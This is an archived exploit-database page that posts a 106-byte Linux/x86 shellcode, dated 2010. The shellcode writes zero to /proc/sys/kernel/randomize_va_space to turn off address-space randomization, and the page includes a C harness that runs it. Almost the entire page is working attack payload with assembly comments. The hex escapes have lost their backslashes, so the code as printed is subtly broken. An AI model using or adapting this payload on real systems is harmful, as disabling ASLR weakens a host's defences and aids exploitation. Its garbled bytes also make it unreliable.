linux/x86 - Disable randomize stack addresse - 106 bytes
Posted on 25 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86 - Disable randomize stack addresse - 106 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================== linux/x86 - Disable randomize stack addresse - 106 bytes ======================================================== /* Title: Linux/x86 - Disable randomize stack addresse - 106 bytes (Set randomize_va_space to zero) Author: Jonathan Salwan <submit (!) shell-storm.org> Web: http://www.shell-storm.org Twitter: http://twitter.com/shell_storm !Database of Shellcodes http://www.shell-storm.org/shellcode/ Date: 2010-05-25 Tested: Linux 2.6.33 - i686 ! You need root euid */ #include <stdio.h> char sc[] = "x31xdb" // xor %ebx,%ebx "x6ax61" // push $0x61 "x89xe3" // mov %esp,%ebx "xb0x0a" // mov $0xa,%al "xcdx80" // int $0x80 "x31xdb" // xor %ebx,%ebx "x6ax65" // push $0x65 "x66x68x61x63" // pushw $0x6361 "x68x61x5fx73x70" // push $0x70735f61 "x68x7ax65x5fx76" // push $0x765f657a "x68x64x6fx6dx69" // push $0x696d6f64 "x68x2fx72x61x6e" // push $0x6e61722f "x68x72x6ex65x6c" // push $0x6c656e72 "x68x73x2fx6bx65" // push $0x656b2f73 "x68x63x2fx73x79" // push $0x79732f63 "x68x2fx70x72x6f" // push $0x6f72702f "x89xe3" // mov %esp,%ebx "x30xc0" // xor %al,%al "xb0x11" // mov $0x11,%al "x31xc9" // xor %ecx,%ecx "x66xb9x41x04" // mov $0x441,%cx "x31xd2" // xor %edx,%edx "x66xbaxa4x01" // mov $0x1a4,%dx "x31xc0" // xor %eax,%eax "xb0x05" // mov $0x5,%al "xcdx80" // int $0x80 "x89xc3" // mov %eax,%ebx "x31xc9" // xor %ecx,%ecx "x66x68x30x0a" // pushw $0xa30 "x89xe1" // mov %esp,%ecx "x31xd2" // xor %edx,%edx "xb2x02" // mov $0x2,%dl "x31xc0" // xor %eax,%eax "xb0x04" // mov $0x4,%al "xcdx80" // int $0x80 "xb0x01" // mov $0x1,%al "xcdx80"; // int $0x80 int main(void) { fprintf(stdout,"Length: %d ",strlen(sc)); (*(void(*)()) sc)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
